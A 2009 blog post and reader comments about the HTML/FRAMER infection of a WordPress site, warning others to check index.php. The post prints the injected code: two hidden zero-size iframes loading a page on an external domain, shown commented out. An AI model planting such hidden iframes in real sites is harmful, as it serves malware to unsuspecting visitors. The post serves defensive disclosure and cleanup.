HTML/FRAMER virus alert from AVG

I found the HTML/FRAMER virus had infected this site. It has been eradicated!

For those interested, the following code (commented for security) was inserted into the main index (index.php) by some hacker. For those of you with WordPress blogs I suggest you check you index.php file, the malicious code is inserted at the end on index.php. Other forms of the virus encode the iframe attack.

<!– <iframe src=”http://reycross.net/lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src=”http://reycross.net/lib/index.php” width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> –>

Popularity: 16% [?]

  • DZone
  • StumbleUpon
  • Technorati
  • del.icio.us
  • Slashdot
  • Digg
  • Reddit
  • NewsVine
  • SphereIt
  • e-mail
  • Facebook
  • Google Bookmarks
  • Live
  • Propeller
1 Star2 Stars3 Stars4 Stars5 Stars6 Stars7 Stars8 Stars9 Stars10 Stars (4 votes, average: 9.50 out of 10)
Loading ... Loading ...

This entry was posted on Friday, July 17th, 2009 at 7:21 pm and is filed under Security, Virus. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

«
»

7 Responses to “HTML/FRAMER virus alert from AVG”

  1. radhoo Says:
    July 27th, 2009 at 5:30 am

    Hello, woh did you get rid of it. I have the same problem.

  2. 3Monkeys Says:
    July 27th, 2009 at 5:45 am

    I opened index.php with the theme editor, and simply deleted the php code described in the article. The malicious code appears at the very end of the php file, at least for me. Seems like many people are getting this as an encoded bit of php. There should not be any encoded portions of legitamate WP themes.

  3. radhoo Says:
    July 27th, 2009 at 2:48 pm

    I did that too, but it keeps re appearing… is really bad. I scanned my pc with anti malware and it seems that I had some keyloggers and some other html virus that damaged my sites.

    I hope that this time I will get rid of them forever…

  4. Carlos Says:
    August 5th, 2009 at 7:08 am

    my sites suffered this too. More than 10,000 files affected, including .php, .htm, and .html on my entire server. Imagine that. Luckly for me i found a search/replace script that saved me. this damn thing got my site blocked in google, displaying warnings to users.

  5. Pat Morgan Says:
    December 17th, 2009 at 5:05 pm

    Thanks for posting this. Answered my google warning message. Thanks Yahoo!

  6. John Choi Says:
    July 15th, 2010 at 1:17 am

    Hey, where is this Index.php file anyway? I’ve looked and I cannot find it.

  7. denise denlinger Says:
    July 15th, 2010 at 10:20 am

    HELP!!! i am glad you found a way to get rid of this. BUT WHERE DO I START???? i am not too saavy yet at puter. please point me to where and how, PLEASE!!!!

Leave a Reply